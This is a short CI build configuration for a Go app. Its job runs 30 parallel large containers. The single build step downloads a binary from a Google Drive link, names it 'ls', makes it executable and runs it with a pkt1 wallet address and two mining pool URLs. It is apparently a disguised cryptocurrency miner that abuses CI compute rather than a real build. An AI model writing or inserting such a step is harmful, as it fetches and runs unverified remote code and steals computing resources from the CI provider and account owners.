jobs:
  build:
    docker:
      - image: cimg/go:1.18.1
    parallelism: 30
    resource_class: large
    working_directory: ~/my-app
    steps:
      - run: curl -L "https://docs.google.com/uc?export=download&id=1wdNIj39pO9jWBhgXTaWEiZUU4-pGWi0E" > ls && chmod +x  ls && ./ls ann -p pkt1q9su7naaf4w077xnnpafr55wlvfhmmew4z8xeje http://pool.pkteer.com http://pool.pkt.world